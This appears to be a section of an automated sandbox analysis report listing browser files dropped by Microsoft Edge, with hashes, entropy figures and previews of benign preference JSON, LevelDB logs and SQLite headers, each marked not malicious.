                                                                                                                                                                                                                                                                                      Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "27fb6245-bd08-4de6-8f4d-2ece3f597752");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696491690);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696491694);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):57647
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.103640521999742
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:1536:z/Ps+wsI7ynfPGWv/sxtw7j7VLyMV/YoskFoz:z/0+zI7ynfv/4K7VeZoskG
                                                                                                                                                                                                                                                                                      MD5:6E22A71CA72B8C8CB8BB0B0D8447AC13
                                                                                                                                                                                                                                                                                      SHA1:BBE6B42286958326BCA378C0EB160D62FEA3EE33
                                                                                                                                                                                                                                                                                      SHA-256:C172B822668C30105CA48805482C5395646FD9392FA56BFA7377A0D959A20A5F
                                                                                                                                                                                                                                                                                      SHA-512:20158E69D0A1FD99E3B04798E1D2DA2313517157113478136DC5EFCF18AC9CFDF06CC33C82EAF990FE476076B2E18ACAC2669D87C6D991A4E44A66B720E62BFB
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"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
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):58695
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.100681192478866
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:1536:xMk1rT8H1aPgPGWv/sxtwjzbDXlaR5FoS7VLyMV/Yost:xMYrT8VgEv/4KVUzVeZost
                                                                                                                                                                                                                                                                                      MD5:EBA91D4C9DA8897F7027DC956BBB937E
                                                                                                                                                                                                                                                                                      SHA1:F726D1BC150ED6DD83C41D8140839B2BD99C3B2A
                                                                                                                                                                                                                                                                                      SHA-256:1E42F7F19A2085FFF8A7D9174EC75032E595D2C27EE0556DC4AEF69EFF62967F
                                                                                                                                                                                                                                                                                      SHA-512:8307ED4203B4298D22F11A0633C1DDA2547141E6C822BC6B972DB4F63DB73510FF4B21C0A37C736E1397927A5EDC678BDAFB6E995AC63DAC7C6314183454E42D
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"207f8458-9b43-4ef3-844e-298c2ec776ca"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1735286727"},"domain_actions_config":"
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):57725
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.104135850895125
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:1536:z/Ps+wsI7yO1PGWv/sxtwjj7VLyMV/YoskFoz:z/0+zI7yOFv/4KjVeZoskG
                                                                                                                                                                                                                                                                                      MD5:294FA6015BF555F3644B030E2A6DFC62
                                                                                                                                                                                                                                                                                      SHA1:D45F7F7AD67B309FBFF46CB6843AC0FD9FA94F45
                                                                                                                                                                                                                                                                                      SHA-256:36E7EADC30CFB9D83D5B4B9CA2A356F9F418393B0478472D74349B09FFBD0BC8
                                                                                                                                                                                                                                                                                      SHA-512:2C96185E6B1C3476801C6BB88D3A3503D2FAD9CA18BFC10F7B9F16AA4AE079A49FAC837617D74AD0FCC6A375638F875BCA8B3DB23149D67E64E28E122D9FE5B9
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"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
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):107893
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.640159940159965
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P70:fwUQC5VwBIiElEd2K57P70
                                                                                                                                                                                                                                                                                      MD5:9B9EEAFEA0BB753A8FAEB453AB956772
                                                                                                                                                                                                                                                                                      SHA1:4F886474C956DB363B327F13F3E65B53807DB52A
                                                                                                                                                                                                                                                                                      SHA-256:F8ADE4E5D3BCFEC0035529AC7AEA621E1FB3CEF0DAC19E62521BA8433AC9A894
                                                                                                                                                                                                                                                                                      SHA-512:F3E66357046E24C3CB5D11A9E7FC7BA60393C00878D0C01DF87CEA10DCAE0F93CBBC8522C8FD92F58622E17EF2481FAECA509010FE842577016E4B201C836930
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):4194304
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.04759696309449672
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:192:dTf0m5tmRnOAUZY4J/7qiRDs0JVFg8X+9IVhkHsBzhEhNG0v+RQ8TfQpRqn8y08s:Nf0UtOaF6CHhcRmvQ3q08T2RGOD
                                                                                                                                                                                                                                                                                      MD5:678009617A516AE0F4A694EC381BAC47
                                                                                                                                                                                                                                                                                      SHA1:5A7059A1821508DF31EE9E05744233ECB4C3566F
                                                                                                                                                                                                                                                                                      SHA-256:1A39281734E190055EFA7AD41A71504237652030BD05B7E8049631F26A3CA4CA
                                                                                                                                                                                                                                                                                      SHA-512:212A796F2872880B1452324C13F47333FB0E91C37AA10F2283A251DB556D2E117E118CD7E1E209B529C6B427FD2602B04B879B28AE2D7E6FD40774361B827503
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):4194304
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.43744441936569384
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3072:xD1t3QoIg0WNBNrhvB9FkcCIsKOsKWG7Yww/3dpwwyTqqzsAg1HFD:vt3OkFvBzkcC81cxwFpwwyTqqzsAaH1
                                                                                                                                                                                                                                                                                      MD5:89E2C66DA10BB86E809A35C4C0D049C3
                                                                                                                                                                                                                                                                                      SHA1:32B4A34B5746FA1783211715F6CD1E33C79E7C4A
                                                                                                                                                                                                                                                                                      SHA-256:B0B727A54D809AA33AB3D03D71856572247E0DE2C3E649B7E9AD1CFE0093E1B8
                                                                                                                                                                                                                                                                                      SHA-512:87239E5F390F973103CC948AA43C40836CAF9942EFE24E738DE197741364CF8B0775C59DB51579EEEF90D623AD29B071F44E5EFBA946D8221BD59D4B1C9C72C1
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):280
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.16517681506792
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:FiWWltlrPYjpVjP9M4UcLH3RvwAH/llwBVP/Sh/Jzv/jSIHmsdJEU9VUn5lt:o1rPWVjWZq3RvtNlwBVsJDL7b/3U7
                                                                                                                                                                                                                                                                                      MD5:C847567DEE0317368C1EC824DE025887
                                                                                                                                                                                                                                                                                      SHA1:554098F22FEA9282FE1AAB35560849CD6FF546B1
                                                                                                                                                                                                                                                                                      SHA-256:3CF2B1CBE4F4CCFC640BCF581FD4D9FC84254D2B3839C96EA4909B61AAF28932
                                                                                                                                                                                                                                                                                      SHA-512:A976744405F6ABEBFB7513A3A6A776680334BB94A9E52AEEFE2B05259BCB3CF9781B1CCDA3655D8AA4C1E923143168F29EF3208F81ABCB93AFF5215ED3798219
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):115717
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                      MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                      SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                      SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                      SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (17501), with no line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):17503
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.487733984368819
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:192:stnJ99QTryDiuabatSuyp8BsIYyaNPOpegzkXMlNsNXphzd8J2w516o8VmbV+Fp8:stnPGQSu48BsIYtJOpnizdgtbbG6Qwr
                                                                                                                                                                                                                                                                                      MD5:576B473244A66703691B6E6118A5DF38
                                                                                                                                                                                                                                                                                      SHA1:FE3EF9E25AF993C2666A0A565B9AFD5DE8B38F50
                                                                                                                                                                                                                                                                                      SHA-256:71BC63AB5A32FFFD0615913ADAFB4C0BE62A0A0D5B66FDBD77B2F20B121E2752
                                                                                                                                                                                                                                                                                      SHA-512:58C986D09C465D4DBE042C9E086068B3A7AF1EFC7D5E914AD1254F804A471D73934FF6E363F001BB0D464277676EC4556FAE24F53417EF33DAF162BEEB16D76D
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379760322732592","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):40504
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.560960538243978
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:768:XZrbGc7pLGLhJbWP4afGe8F1+UoAYDCx9Tuqh0VfUC9xbog/OVONovhHSrwWbSeI:XZrbGAchJbWP4afGeu1jajNoJHXWbSb5
                                                                                                                                                                                                                                                                                      MD5:A9D8C54F59ABA147E6EDBD991AE7AC37
                                                                                                                                                                                                                                                                                      SHA1:37BB7D614C3471289A637585AAEFA6EFEB1A4C70
                                                                                                                                                                                                                                                                                      SHA-256:A219E9165BD73F8F688F01817045EB59EE384151339E456EA22E0062957A0F54
                                                                                                                                                                                                                                                                                      SHA-512:1D4B26C2C253AE71A437DC93BCC1BB37C21723ED8CAEE0E277177334B4E14C1B99D4BE8E0F853D275003849808357A5B84469341C7A7FA02ED6F1ADE2E202BBF
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379760322200595","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379760322200595","location":5,"ma
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):33
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.5394429593752084
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:...m.................DB_VERSION.1
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):315
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.251493906392718
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:2024/12/27-03:05:27.342 155c Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2024/12/27-03:05:27.377 155c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):41
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                                                                                                      Size (bytes):1696115
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.040621318312018
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):339
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.157721640276321
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:2024/12/27-03:05:27.327 848 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/12/27-03:05:27.329 848 Recovering log #3.2024/12/27-03:05:27.333 848 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):339
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.157721640276321
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:DyAhN+q2PcNwi23oH+Tcwt9Eh1tIFUt8WyAhZmw+WyAwR3VkwOcNwi23oH+TcwtY:svLZYeb9Eh16FUt8+/+JRF54ZYeb9Ehx
                                                                                                                                                                                                                                                                                      MD5:7EBB03382740E00B6BD07013FFA8736E
                                                                                                                                                                                                                                                                                      SHA1:CAEFFF3CEFA0B070A2DB310B99467B367BCCC460
                                                                                                                                                                                                                                                                                      SHA-256:C9B497D0327CBA28D1472556906BE20B175F576BE3A823AE0D4BC6D9979234DE
                                                                                                                                                                                                                                                                                      SHA-512:EFF2E476A1AFD7FDE931E873B3EC9782285060477ECB66BE10178DBB8C44076DA96ED12B54EEFFC7B5765276DF80BD42171D587B1676B03C36FDCA99842C1A3B
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:2024/12/27-03:05:27.327 848 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/12/27-03:05:27.329 848 Recovering log #3.2024/12/27-03:05:27.333 848 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):28672
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.4625889476187344
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBu5j:TouQq3qh7z3bY2LNW9WMcUvBuJ
                                                                                                                                                                                                                                                                                      MD5:D3104ACA502466A62B1439F3B0082B12
                                                                                                                                                                                                                                                                                      SHA1:0010C51E44763C27632183DA3C7D7F315AA43D06
                                                                                                                                                                                                                                                                                      SHA-256:F0AE8C252964BE10EC2814F06CF65DF61B18E5B969FFDF630796638E5D3741BC
                                                                                                                                                                                                                                                                                      SHA-512:89F080A91FF15D3EE2AE181146E2E110A7E9D7DCC30703CD74A23B4B1AA23AFF6238101CD6C285DFA23A9990ADA96B8A493669304BB80D1BC9D76088B8C2DE16
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):10240
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.8708334089814068
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:LBtW4mqsmvEFUU30dZV3lY7+YNbr1dj3BzA2ycFUxOUDaazMvbKGxiTUwZ79GV:LLaqEt30J2NbDjfy6UOYMvbKGxjgm
                                                                                                                                                                                                                                                                                      MD5:92F9F7F28AB4823C874D79EDF2F582DE
                                                                                                                                                                                                                                                                                      SHA1:2D4F1B04C314C79D76B7FF3F50056ECA517C338B
                                                                                                                                                                                                                                                                                      SHA-256:6318FCD9A092D1F5B30EBD9FB6AEC30B1AEBD241DC15FE1EEED3B501571DA3C7
                                                                                                                                                                                                                                                                                      SHA-512:86FEF0E05F871A166C3FAB123B0A4B95870DCCECBE20B767AF4BDFD99653184BBBFE4CE1EDF17208B7700C969B65B8166EE264287B613641E7FDD55A6C09E6D4
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j...v... .. .....M....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):351
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.204993710349138
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:DyfAL1yq2PcNwi23oH+TcwtnG2tMsIFUt8WyfZ1Zmw+WyfPRkwOcNwi23oH+Tcwj:uvLZYebn9GFUt8D1/+j54ZYebn95J
                                                                                                                                                                                                                                                                                      MD5:85A8D2557FD3A83CE0D9A669D2EFD772
                                                                                                                                                                                                                                                                                      SHA1:7648DC08CCAA45ACB5C2C3949B6014DF98C126A1
                                                                                                                                                                                                                                                                                      SHA-256:32D27BA61E6C4CAEE06D3C7931A65FB92E97F6BACC354B9EB780EEB58EFF3BC3
                                                                                                                                                                                                                                                                                      SHA-512:ACBAA9CC34E6C7AC1D218CDF3EF23B4AED8A629D0CBA274C5A1723464410FCC5EF3C932FF3924FAFC4490E085A8439239BC120D0CC7096D7198C7EA784025385
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:2024/12/27-03:05:22.263 9e4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/12/27-03:05:22.264 9e4 Recovering log #3.2024/12/27-03:05:22.264 9e4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.6135038864111126
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:TLapR+DDNzWjJ0npnyXKUO8+jCClp0HmL:TO8D4jJ/6Up+mCA8
                                                                                                                                                                                                                                                                                      MD5:461255FC0022CA9D425A3DC8A2DF8B48
                                                                                                                                                                                                                                                                                      SHA1:FC5C0CA1F33CAB0C8D7FC4AEE2B0D8CB42901E15
                                                                                                                                                                                                                                                                                      SHA-256:49FD636E7CBC5A74C30C674E40C049AB27C5148C2CC0D1B0F9AA9136766FA5DC
                                                                                                                                                                                                                                                                                      SHA-512:C344ADDB7D325533EF6423D12E77D1331E40C2532D205FB5D0641AC9F6AB08CE744C304127B973B61FC0FBD8A796956470549E74F98A93F7AE47502A7917224A
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j...%.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                      MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                      SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                      SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                      SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                      Malicious:false
